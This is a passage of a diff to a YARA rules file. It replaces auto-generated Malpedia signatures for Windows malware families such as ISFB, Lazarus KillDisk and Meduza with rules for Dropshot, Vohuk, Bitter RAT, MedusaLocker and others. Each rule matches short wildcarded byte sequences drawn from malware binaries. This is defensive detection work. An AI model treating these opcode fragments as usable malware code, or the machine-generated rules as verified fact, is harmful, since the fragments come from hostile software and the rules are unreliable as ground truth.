-		$sequence_3 = { 6a01 e8???????? 83c404 8945fc 8b4d10 51 8b550c }
-		$sequence_4 = { 85c0 7505 8b45fc eb1c 8b4dfc e8???????? 8b4d08 }
-		$sequence_5 = { e9???????? 8b4518 3b450c 7765 8b4d18 51 8b4df0 }
-		$sequence_6 = { ff15???????? 8945e0 837de0ff 7524 ff15???????? 8945dc }
-		$sequence_7 = { 51 ff15???????? 85c0 0f853a030000 8d95d4feffff 52 8d85d4f6ffff }
-		$sequence_8 = { 83c404 b001 e9???????? 83ff0b 7510 8bd6 8bcb }
-		$sequence_9 = { 8b45f0 c7400c00000000 68???????? 8b4df0 83c110 }
+		$sequence_0 = { ffc3 4d0fbfd0 66450fbed2 450fbfd5 4c63d3 e9???????? e9???????? }
+		$sequence_1 = { 0f8774000000 0f8530000000 488b542428 480fb7cd 488d4b14 e9???????? ff15???????? }
+		$sequence_2 = { 41b07c 6644896c2420 480fabc8 48ffc8 4180d05d 488d542420 }
+		$sequence_3 = { 4586c0 4c8bc2 f7d2 488bd1 488d0de21fe5ff e8???????? 488d0dd61fe5ff }
+		$sequence_4 = { 4184eb f9 4c03d1 4d8d1c0b f8 41f6c484 4585c9 }
+		$sequence_5 = { 688c4bd073 0f82f8aefeff 48818424100000006c322f5a 5e 5e 5e }
+		$sequence_6 = { 418b0c84 98 23cd 660fb6c6 4433c1 98 4633048b }
+		$sequence_7 = { e9???????? 0f84c0000000 418d5424ff 6641f7c2266e 4c0fa4cfaa 4c8bed }
+		$sequence_8 = { 55 d9b726ae0b68 a947d046d6 5b 21bd5e13d92f 5a 81e516495a66 }
+		$sequence_9 = { f5 f69c2418000000 5f 415e 415e 415e 5f }
 
 	condition:
-		7 of them and filesize < 1124352
+		7 of them and filesize < 3702784
 }
-rule MALPEDIA_Win_Lockfile_Auto : FILE
+rule MALPEDIA_Win_Mm_Core_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ce8b9f2d-3289-5da5-8ae6-f5695e030c37"
+		id = "43e09f87-25f0-5aa1-a65d-f3cf8216d568"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockfile"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lockfile_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mm_core"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mm_core_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "aad82c712a5f767aa5023ac75b23ae49a83688df028acae164a8fa13e666e8c1"
+		logic_hash = "6a74d0b4f0725617f5a9081525f73e5b30645b5ad4c0ae527057295ae3a12104"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -108540,34 +108950,34 @@ rule MALPEDIA_Win_Lockfile_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 48f76328 498d0c00 488b4630 493bc8 4883d200 4c03e2 488955f7 }
-		$sequence_1 = { 48896c2418 56 4156 4157 4883ec30 498be9 4d8bf0 }
-		$sequence_2 = { c784249000000002000000 4c8bc7 488bd7 488d4c2420 e8???????? 90 4c8d4318 }
-		$sequence_3 = { 4898 488d0d74280700 8b542438 ffc2 8bd2 4c8b442430 418b1490 }
-		$sequence_4 = { e8???????? cc 4057 4883ec20 488b5110 }
-		$sequence_5 = { 498b4348 493bc8 4883d200 4c03e2 48895587 48f76650 4c8d0401 }
-		$sequence_6 = { 48f76118 4c894df0 4c8bea 488d0c03 483bcb 488b5d50 4983d500 }
-		$sequence_7 = { 4433d5 41c1c802 4403d0 81c59979825a 4503d3 448bda 4533d8 }
-		$sequence_8 = { 488d059fdf0700 bf04000000 48895c2450 4c8be1 8bd7 488d4c2460 6666660f1f840000000000 }
-		$sequence_9 = { 418bcd 4103d4 c1c90d 448b2424 4103d0 418bc5 4403e2 }
+		$sequence_0 = { 33ff 8db7e8ba0010 ff36 e8???????? 83c704 }
+		$sequence_1 = { ff15???????? 85c0 0f8482000000 8b442410 3bc7 747a 40 }
+		$sequence_2 = { 6800000008 51 51 51 66894c2464 8bcb }
+		$sequence_3 = { 8bf0 8975d4 85f6 0f8485000000 c745fc00000000 8a0e }
+		$sequence_4 = { 8b84246c080000 56 57 33ff 6a3c 8bf2 }
+		$sequence_5 = { 6a00 50 e8???????? 83c40c 33c0 33c9 8d542408 }
+		$sequence_6 = { 3bc1 0f87f5090000 ff248516540010 33c0 }
+		$sequence_7 = { 33c0 eb1a 8bc8 83e01f c1f905 8b0c8d40400110 c1e006 }
+		$sequence_8 = { 83e71f c1e706 8b048540400110 8d44380c }
+		$sequence_9 = { c744240c01010000 ff15???????? 8d4c2418 51 8d54240c }
 
 	condition:
-		7 of them and filesize < 1163264
+		7 of them and filesize < 319488
 }
-rule MALPEDIA_Win_Isfb_Auto : FILE
+rule MALPEDIA_Win_Dropshot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b7221ee8-15b6-53d3-9858-cbee4891c3dd"
+		id = "346ce58d-bd06-5f2e-8d2b-941cfe3b7a37"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.isfb"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.isfb_auto.yar#L1-L1225"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dropshot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dropshot_auto.yar#L1-L100"
 		license_url = "N/A"
-		logic_hash = "8c0f88cb914238661f125a7c021aa83545337967694ef579c4ecd4c1e0598934"
+		logic_hash = "e0a96c7028a31f8096e80273f88669f127d961f8172465734bc77ab98df7c7f9"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -108579,163 +108989,30 @@ rule MALPEDIA_Win_Isfb_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb02 33c0 3bc7 741b 50 33c0 }
-		$sequence_1 = { 50 33c0 e8???????? 3bc7 740f }
-		$sequence_2 = { e8???????? eb02 33c0 3bc7 7413 50 }
-		$sequence_3 = { 3bc7 7413 50 6a10 58 e8???????? }
-		$sequence_4 = { 6a10 58 e8???????? 3bc7 7406 50 e8???????? }
-		$sequence_5 = { ff75f0 ff75f4 6822010000 e9???????? ff7508 }
-		$sequence_6 = { 6a64 ff15???????? a1???????? 85c0 7407 83ee64 }
-		$sequence_7 = { ff35???????? e8???????? 8bf0 3bf3 7443 }
-		$sequence_8 = { 5e 8bc5 5d 5b 59 c20400 8325????????00 }
-		$sequence_9 = { 59 c20400 8325????????00 6a00 68???????? 6a01 ff742410 }
-		$sequence_10 = { ff15???????? 85c0 a3???????? 7402 ffe0 c20400 }
-		$sequence_11 = { 50 e8???????? 3bdf 7414 }
-		$sequence_12 = { c20400 55 8bec 83ec0c a1???????? 8365f800 57 }
-		$sequence_13 = { ff15???????? 3c05 7506 84e4 7704 }
-		$sequence_14 = { 8b4e10 83e103 740d 51 50 ff7510 e8???????? }
-		$sequence_15 = { 7417 8b10 2b55fc 8b7d10 0155fc }
-		$sequence_16 = { ff7510 e8???????? 83c40c c745fc01000000 8b4610 }
-		$sequence_17 = { 8bd8 85db 895df4 0f84c7000000 56 53 }
-		$sequence_18 = { b8???????? 53 bb60ea0000 53 ff750c }
-		$sequence_19 = { 8b7d10 0155fc 83451004 83c004 49 8917 75e9 }
-		$sequence_20 = { ff37 ff15???????? 2b442414 50 8b07 }
-		$sequence_21 = { 6a0d 58 e8???????? 85c0 740d 8906 83c604 }
-		$sequence_22 = { 83c40c 8974240c c6401a00 8b44240c 85c0 }
-		$sequence_23 = { 8b07 03442418 50 56 ff5310 }
-		$sequence_24 = { 5b c20800 55 8bec 83e4f8 83ec14 8364240400 }
-		$sequence_25 = { 8906 83c604 47 83ff03 }
-		$sequence_26 = { ff35???????? ff15???????? 8b442414 8b4c240c 8907 8b442418 894110 }
-		$sequence_27 = { 8b4b24 2b4b28 894c2410 8b4b34 f6c140 }
-		$sequence_28 = { 8b5d0c 837b240c 56 57 8b3b 897c241c 760a }
-		$sequence_29 = { 8b3b 897c241c 760a 8b4b20 e8???????? eb02 }
-		$sequence_30 = { 74a3 33ff eb0b 33ff eb03 }
-		$sequence_31 = { 8b4a0c 3bc8 7415 8b5210 }
-		$sequence_32 = { 752f 8b450c 8930 eb33 6a00 }
-		$sequence_33 = { 8b4a3c 03ca 0fb75114 56 }
-		$sequence_34 = { 50 8d4508 50 53 8bc6 e8???????? }
-		$sequence_35 = { 750e 837d0800 7408 ff7508 e8???????? }
-		$sequence_36 = { 83ec48 53 8b5d08 56 57 33ff }
-		$sequence_37 = { 8b5210 3bd0 740e 8b742408 }
-		$sequence_38 = { 837d1800 b8???????? 7505 b8???????? 53 }
-		$sequence_39 = { 8a4604 2404 f6d8 1bc0 83e006 }
-		$sequence_40 = { 742d ff75fc 6a0d 58 }
-		$sequence_41 = { c21000 55 8bec 83ec14 a1???????? 53 }
-		$sequence_42 = { 50 57 6a01 ff75e0 68???????? e8???????? }
-		$sequence_43 = { 53 b800080000 50 56 ff35???????? }
-		$sequence_44 = { 8b35???????? 50 83c604 e8???????? 3bfb }
-		$sequence_45 = { 50 8bd7 e8???????? eb02 33c0 3bc3 741b }
-		$sequence_46 = { 50 e8???????? 3bfb 7414 }
-		$sequence_47 = { e8???????? 85db 7423 8b0d???????? 0fb701 }
-		$sequence_48 = { ff75fc 56 ff35???????? ff15???????? 53 56 }
-		$sequence_49 = { 0f854affffff 894330 e9???????? 55 }
-		$sequence_50 = { 752e 53 e8???????? 6a01 6a01 ff7514 }
-		$sequence_51 = { 8bf8 85ff 0f845d010000 8b4730 a808 }
-		$sequence_52 = { 0f84e2000000 8b7334 8d442418 50 8d442410 50 e8???????? }
-		$sequence_53 = { 8bf8 ff7510 57 ff750c 53 e8???????? 3bfe }
-		$sequence_54 = { ff15???????? 53 56 ff35???????? ff15???????? 5b }
-		$sequence_55 = { 0f8544010000 8b472c a801 742d }
-		$sequence_56 = { 50 56 ff5214 8bf7 8bfe e8???????? 5f }
-		$sequence_57 = { 56 ff35???????? 8945f8 ff15???????? 8bd8 }
-		$sequence_58 = { 8b4330 a804 0f8451ffffff 8b470c }
-		$sequence_59 = { 33f6 3975fc 7410 ff75fc 56 ff35???????? }
-		$sequence_60 = { a840 7509 83632800 e9???????? 8b4330 a840 0f84e2000000 }
-		$sequence_61 = { 53 e8???????? 3bfe 740e 57 56 }
-		$sequence_62 = { 7708 0fb7c0 83e820 eb03 0fb7c0 668901 5f }
-		$sequence_63 = { c9 c20400 51 56 ff74240c }
-		$sequence_64 = { e8???????? 85c0 7507 33db 895d08 eb03 }
-		$sequence_65 = { 50 57 e8???????? e9???????? 68???????? }
-		$sequence_66 = { ff35???????? ff15???????? 33db 6a01 e8???????? }
-		$sequence_67 = { 8b45fc 5f 5b c9 c21400 55 }
-		$sequence_68 = { 8b3d???????? 56 ffd7 53 56 ffd7 }
-		$sequence_69 = { 8ac3 5b c9 c20400 53 56 8bf0 }
-		$sequence_70 = { 8bf0 8932 83c204 ff4c240c 75e6 5e 5b }
-		$sequence_71 = { 8bf1 05fefeffff 33db 33c9 }
-		$sequence_72 = { 750d eb09 ff7618 ff15???????? }
-		$sequence_73 = { 8b02 43 8acb d3c0 33c6 33442410 8bf0 }
-		$sequence_74 = { 5b c3 a1???????? 83c040 }
-		$sequence_75 = { 3bfb 753e ff7618 8b3d???????? ffd7 ff761c }
-		$sequence_76 = { 47 83c304 3b3e 72dc 8b45fc }
-		$sequence_77 = { 53 ff7614 ff15???????? 85c0 7512 ff15???????? }
-		$sequence_78 = { 8d442430 50 8d442428 50 8d442428 50 }
-		$sequence_79 = { 488bd8 0f8405010000 488bc8 ff15???????? }
-		$sequence_80 = { 7416 a1???????? 83c004 50 be???????? }
-		$sequence_81 = { e8???????? e9???????? b909010000 e9???????? }
-		$sequence_82 = { ff15???????? 488bcf 48870d???????? 483bcf 7405 }
-		$sequence_83 = { c744242000010000 ff15???????? 4883f8ff 488bf8 7442 }
-		$sequence_84 = { b90e010000 41b800000100 4889442420 e8???????? e9???????? }
-		$sequence_85 = { 741d 3dd2100000 7416 a1???????? }
-		$sequence_86 = { ff35???????? ffd3 8bd8 85db 7476 }
-		$sequence_87 = { 898c24f0000000 4533c9 4533c0 498bcb ff5028 }
-		$sequence_88 = { 0f8386000000 488b18 8364245800 33c0 21442450 21442454 }
-		$sequence_89 = { 6a03 8935???????? 8935???????? 8935???????? }
-		$sequence_90 = { 488bcf c744242860ea0000 4c0f45c8 48895c2420 e8???????? 85c0 8bd8 }
-		$sequence_91 = { 53 56 8bf1 05fefeffff }
-		$sequence_92 = { a1???????? 25efff0000 0bc2 e9???????? }
-		$sequence_93 = { 898424f4000000 498b03 898c24f0000000 4533c9 }
-		$sequence_94 = { 33db 66ba2000 498bcc ff15???????? 4885c0 488bf8 7417 }
-		$sequence_95 = { 8b8c2490000000 83bc248800000000 4c8b442440 488b542448 }
-		$sequence_96 = { e9???????? 4885f6 7417 4863461c 2b6e1c 4c03e8 488b4610 }
-		$sequence_97 = { 4883ec20 488bf1 488b0d???????? 4c8be2 }
-		$sequence_98 = { 4154 4155 4883ec30 33db 33ed 418bf9 48215810 }
-		$sequence_99 = { 488b0d???????? 448bc3 33d2 41c1e003 ff15???????? 4885c0 488be8 }
-		$sequence_100 = { 0f84eb000000 83780408 0f84d9000000 488bcb e8???????? }
-		$sequence_101 = { 488b0d???????? 33d2 ff15???????? bb01000000 498bcc eb07 83c301 }
-		$sequence_102 = { 895df4 895df0 c745f857000000 bf19010000 }
-		$sequence_103 = { eb08 488bce e8???????? 488b5c2440 488b742448 488bc7 }
-		$sequence_104 = { 488b5610 4d8bc6 488bc8 e8???????? 4863561c 8bc5 2b461c }
-		$sequence_105 = { 488bcf ff15???????? 4c8964dd00 83c301 }
-		$sequence_106 = { 5f c20400 55 8bec 83e4f8 81ec9c000000 53 }
-		$sequence_107 = { 8bc7 e8???????? 8d4618 8b08 50 51 ff7614 }
-		$sequence_108 = { 8bc6 e8???????? 8b06 8b08 57 }
-		$sequence_109 = { 6a20 40 50 ffd6 }
-		$sequence_110 = { 5e 33c0 c9 c20400 55 8bec 51 }
-		$sequence_111 = { 4c8bcf 4889442428 8364242000 33d2 33c9 ff15???????? }
-		$sequence_112 = { 7557 813d????????04df2209 743c 8d4604 50 }
-		$sequence_113 = { 488b0d???????? 4c63c0 33d2 4983c00c ff15???????? }
-		$sequence_114 = { ff15???????? 83cfff 3bc7 8bd8 }
-		$sequence_115 = { 480f45ca 488bc1 4883c438 c3 48895c2408 48896c2410 4889742418 }
-		$sequence_116 = { 448bc0 8bd8 33d2 4983c001 }
-		$sequence_117 = { e9???????? 488bcb ff15???????? a810 }
-		$sequence_118 = { ff15???????? 8945f8 85c0 7418 3bd8 7514 57 }
-		$sequence_119 = { 803f2a 750b 4883c701 83c3ff }
-		$sequence_120 = { 85ff 756f 8b0d???????? 8b05???????? }
-		$sequence_121 = { 4d03c0 33d2 ff15???????? 488be8 }
-		$sequence_122 = { 75ee 488bd5 33c9 ff15???????? 488bf8 }
-		$sequence_123 = { 488bf8 4885c0 7420 488bd3 488bc8 ff15???????? 488b0d???????? }
-		$sequence_124 = { 741d 397b04 7618 488d7308 488b0e ff15???????? ffc7 }
-		$sequence_125 = { c744242880000000 89742420 ff15???????? 488bf0 4883f8ff 742b }
-		$sequence_126 = { 7510 488b0b e8???????? 85c0 0f859b000000 }
-		$sequence_127 = { 85c0 0f8561010000 8b4348 a801 742c 488b0b e8???????? }
-		$sequence_128 = { 85c0 0f859b000000 4863533c 488b4608 }
-		$sequence_129 = { 8b434c 84c0 0f89a3000000 8b434c a804 7415 }
-		$sequence_130 = { 85c0 0f85e8000000 488b4608 488b0e 4533c9 }
-		$sequence_131 = { e8???????? 85c0 0f8561010000 8b4348 }
-		$sequence_132 = { 7505 217b3c eb0b 8b434c 84c0 0f89a3000000 }
-		$sequence_133 = { 7508 8b5304 83c304 01f2 8b4c241c 01d1 }
-		$sequence_134 = { 8b4c2424 01c1 83c304 894c2410 56 90 }
-		$sequence_135 = { 40 c1ca08 e2e4 c9 }
-		$sequence_136 = { 56 57 51 64ff3530000000 58 8b400c }
-		$sequence_137 = { 30c9 eb67 8044241301 0fb6ca 01cb }
-		$sequence_138 = { 89ec 5d c20c00 60 }
-		$sequence_139 = { 90 89ce 83e603 750c 8b5d10 }
-		$sequence_140 = { 8b3a 83c204 8b0a 83e908 }
+		$sequence_0 = { 6a05 ff15???????? ff15???????? 6a00 6a00 6a00 }
+		$sequence_1 = { ff15???????? 5d c3 3b0d???????? f27502 }
+		$sequence_2 = { 6a64 ff15???????? 6800800000 6a00 }
+		$sequence_3 = { e8???????? eb05 e8???????? 68e8030000 ff15???????? }
+		$sequence_4 = { 6a00 6a00 ff15???????? 6a00 6a00 68???????? }
+		$sequence_5 = { ff15???????? 6a04 6800100000 6808020000 }
+		$sequence_6 = { e8???????? 83c40c 6a04 6800100000 6804010000 6a00 }
+		$sequence_7 = { ff15???????? 6a00 ff15???????? 6a05 ff15???????? ff15???????? }
 
 	condition:
-		7 of them and filesize < 2940928
+		7 of them and filesize < 483328
 }
-rule MALPEDIA_Win_Meduza_Auto : FILE
+rule MALPEDIA_Win_Vohuk_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e3895974-72b9-57f5-8c34-0e6d028adf2b"
+		id = "fa7917d0-5d38-5842-a477-3065670570e2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.meduza"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.meduza_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vohuk"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.vohuk_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "91edd922ee662fa1f50c4b9c5768d207acd5144b81bbe8f2830a6c18fd7c29e5"
+		logic_hash = "1c7046d07a287745fd2dd564d0be780eb277cd73b0fb9a0541750f2b4df4fc07"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -108749,32 +109026,32 @@ rule MALPEDIA_Win_Meduza_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b8d7cf2ffff 0f288d90ebffff 898decf8ffff 8d8d90ebffff 8985e8f8ffff 8d5101 660fef8de0f8ffff }
-		$sequence_1 = { 898db4f8ffff 8985b0f8ffff c78548f8ffff22b9d72e c7854cf8ffff97001a04 8b8548f8ffff 8b8d4cf8ffff c5fe6f8540f1ffff }
-		$sequence_2 = { 898d54f9ffff c785d8e4ffff12b8295c c785dce4ffffd94ef7ef 8b85d8e4ffff 8b8ddce4ffff 898558f9ffff 898d5cf9ffff }
-		$sequence_3 = { 0f288d00edffff 898d5cfaffff 8d8d00edffff 898558faffff 8d5101 660fef8d50faffff 0f298d00edffff }
-		$sequence_4 = { 8b4908 8d5801 2bca 895de0 c1f904 b8ffffff0f 8bd1 }
-		$sequence_5 = { 0f1f440000 8a01 41 84c0 75f9 2bca 8d8530e1ffff }
-		$sequence_6 = { c78578fdffff88642bdd c7857cfdffff13203a28 8b8578fdffff 8b8d7cfdffff 898d2cfeffff 898528feffff c78578fdffff6d0b2891 }
-		$sequence_7 = { 6aff 68???????? 64a100000000 50 53 81eca8060000 a1???????? }
-		$sequence_8 = { c5f8298d80f4ffff c5f81185e8e8ffff c785f8e8ffff00000000 c785fce8ffff00000000 c5f877 8a01 41 }
-		$sequence_9 = { 51 52 e8???????? 83c408 eb08 85c9 0f85a9000000 }
+		$sequence_0 = { c745a441003500 b81f6b193a 8bce f7ee c1fa05 8bc2 c1e81f }
+		$sequence_1 = { c7403c9e008200 c7404083008300 c74044ce00c200 c74048ce00d100 c7404cbb00b700 c74050ce00d500 }
+		$sequence_2 = { e8???????? ff75ac 6a00 56 ffd0 8b7da0 e9???????? }
+		$sequence_3 = { c745ec00000000 50 ffd7 85c0 7474 8b0d???????? ba43c7bfd0 }
+		$sequence_4 = { 83f804 7646 6a14 81ff00010000 0f8618010000 51 }
+		$sequence_5 = { 7586 c745fc2f000000 8d9dd8feffff 8b5334 8d4004 8b33 8d5b04 }
+		$sequence_6 = { c645ff00 8b0d???????? ba05bc94bf 8b35???????? 6a15 e8???????? }
+		$sequence_7 = { 7307 bee8030000 eb0d 81fe10270000 7605 be10270000 8b0d???????? }
+		$sequence_8 = { ffd0 8bd8 bf41000000 b81a000000 8945fc f6c301 0f858a000000 }
+		$sequence_9 = { 51 6a38 8d8d60ffffff 51 6a0a 56 ffd0 }
 
 	condition:
-		7 of them and filesize < 1433600
+		7 of them and filesize < 260096
 }
-rule MALPEDIA_Win_Hi_Zor_Rat_Auto : FILE
+rule MALPEDIA_Win_Zedhou_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cc3751c1-3c9f-5c03-98ac-f7ffbc0daf9f"
+		id = "671058cb-44d0-5a2d-a903-c2aaa9e6edab"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hi_zor_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hi_zor_rat_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zedhou"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zedhou_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "71847819d2d9074c6684d2c1f561750135c21371e8d9757a34aa466c08b5e5fd"
+		logic_hash = "e746dfbb5d54339f68149693ef0514b3aa092790791cb02e6ab7c27b77b04068"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -108788,32 +109065,32 @@ rule MALPEDIA_Win_Hi_Zor_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 235014 0bda 8b501c 03df 8d9413aff7448b 8bde }
-		$sequence_1 = { 83c002 6685c9 75f5 8dbdc8f6ffff 2bc2 83c7fe 668b4f02 }
-		$sequence_2 = { c1e611 0bd6 03501c 8bfa f7d7 237810 23da }
-		$sequence_3 = { 33db 68fe0f0000 8d94248e080000 33c9 53 52 }
-		$sequence_4 = { 8bf8 52 57 ff15???????? 8b4d0c 8b5508 6a00 }
-		$sequence_5 = { 6a00 8bf0 8d45f0 50 56 6a00 }
-		$sequence_6 = { 25ffffff1f 03c0 6a40 03c0 c1ea1d }
-		$sequence_7 = { 50 89bb40010000 89bd58ffffff ff15???????? }
-		$sequence_8 = { 035858 8975fc 8b701c 8d9c335314c4ff 8b75f8 23f7 }
-		$sequence_9 = { 0fb6b6b4490010 ff24b594490010 52 53 8bf9 e8???????? 5f }
+		$sequence_0 = { 03c8 8d954cfdffff 51 8d8550fcffff 52 50 68???????? }
+		$sequence_1 = { 50 0f80d8000000 51 52 e8???????? ffd7 8b85d4feffff }
+		$sequence_2 = { 68???????? ff15???????? 8bd0 8d8d70ffffff ff15???????? 50 8d956cffffff }
+		$sequence_3 = { 8b55a0 52 ff15???????? 8bd0 8d4d98 ff15???????? 50 }
+		$sequence_4 = { 6a00 51 50 ff35???????? ff15???????? 85c0 0f8c0b1a0000 }
+		$sequence_5 = { 8b04c5fc201822 8b7824 8b450c 85ff 0f847c340000 8b08 3b0f }
+		$sequence_6 = { ebe5 55 8bec 83ec18 53 56 57 }
+		$sequence_7 = { 8bcf e8???????? 8bf0 8bcb ff760c ff7608 e8???????? }
+		$sequence_8 = { 8d45d4 50 6a02 ff15???????? 83c40c 8d4dc0 51 }
+		$sequence_9 = { ffb610060000 81c610060000 8bc8 e8???????? ff36 832700 }
 
 	condition:
-		7 of them and filesize < 73728
+		7 of them and filesize < 499712
 }
-rule MALPEDIA_Win_Lazarus_Killdisk_Auto : FILE
+rule MALPEDIA_Win_Bitter_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "51d8d349-628d-5955-8390-6050e3d90319"
+		id = "b191a00c-6fde-5571-a34e-d2213ef4e8fa"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarus_killdisk"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lazarus_killdisk_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitter_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bitter_rat_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "0f1cb10726a24b0f5193b1d9b38bf0914806bbc39c92530769ca658a86bfb258"
+		logic_hash = "a43bde583e40f1f224309d84df87c4be4d19f266b740acdb3a4dfc9719f341d8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -108827,32 +109104,32 @@ rule MALPEDIA_Win_Lazarus_Killdisk_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d48e0 80f93f 7706 0fbec0 83c020 }
-		$sequence_1 = { 56 ffd7 4b 75ea 56 ff15???????? }
-		$sequence_2 = { 7438 8d55f0 52 68???????? }
-		$sequence_3 = { 57 8d4c242c 68???????? 51 e8???????? }
-		$sequence_4 = { 8d4402ff 0fa4c109 6a00 894df4 8d4df4 c1e009 }
-		$sequence_5 = { 6a00 8d85e0fdffff 50 6800020000 }
-		$sequence_6 = { 6a00 6800000002 ffd3 8bf0 83feff }
-		$sequence_7 = { eb08 8d5de8 e8???????? 8b85e4fdffff 40 83c610 8985e4fdffff }
-		$sequence_8 = { 8d75a6 8b06 8b4e08 8b560c 8945e8 }
-		$sequence_9 = { ffd7 85c0 7424 68???????? 8d95e4feffff 52 }
+		$sequence_0 = { 42 00542f42 00cf 2f }
+		$sequence_1 = { 68d4070000 e8???????? 83c414 a1???????? }
+		$sequence_2 = { 6a02 6a04 8d85d4fdffff 50 ff15???????? }
+		$sequence_3 = { 83e11f c1e106 8b048500124700 c644080401 57 }
+		$sequence_4 = { 51 8b954cd9ffff 8d84157cdcffff 50 e8???????? 83c40c 8b854cd9ffff }
+		$sequence_5 = { f3ab c745f8???????? b80a000000 668945ec b802000000 668945e0 0fbf45ec }
+		$sequence_6 = { 03048d00124700 eb02 8bc2 f6402480 0f8567ffffff 33c0 }
+		$sequence_7 = { 03c7 03cf 83ff1f 0f87da030000 ff24bda8864200 8bc6 e9???????? }
+		$sequence_8 = { 8bf4 8d8568feffff 50 6a02 ff15???????? 3bf4 }
+		$sequence_9 = { 8d8d68faffff 51 e8???????? 83c408 8bf4 8d85acfeffff }
 
 	condition:
-		7 of them and filesize < 209920
+		7 of them and filesize < 1130496
 }
-rule MALPEDIA_Win_Waterminer_Auto : FILE
+rule MALPEDIA_Win_Medusalocker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8c2bad66-5d35-57b7-b9da-21c6dec00989"
+		id = "9e990ab4-0b70-5ed2-9c4d-a3d81f9ab05c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterminer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.waterminer_auto.yar#L1-L162"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusalocker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.medusalocker_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "f10b4bcaeeaace43d5cd2141c609b5656e22416293022c0fdf8f9cf3861e271d"
+		logic_hash = "1656532605d9f1886fe3ced1ab1c80cac05eec34432a579d536b1abe4c8a22b3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -108866,40 +109143,34 @@ rule MALPEDIA_Win_Waterminer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 6804100020 8b5508 52 }
-		$sequence_1 = { 8b9584fdffff 0fb68208794400 ff2485f0784400 8b8decfdffff 83c904 898decfdffff }
-		$sequence_2 = { 03bc24a8000000 488bcd 4c8d0d35cb0300 83e13f }
-		$sequence_3 = { b804000000 6bc014 8b8880434b00 330d???????? 894dfc }
-		$sequence_4 = { 02d0 49ffc3 418d4001 881418 }
-		$sequence_5 = { 8d8518f5ffff 50 e8???????? 83c404 898500f7ffff e8???????? 85c0 }
-		$sequence_6 = { 0344240c 4403d0 428b4405e7 418bd2 }
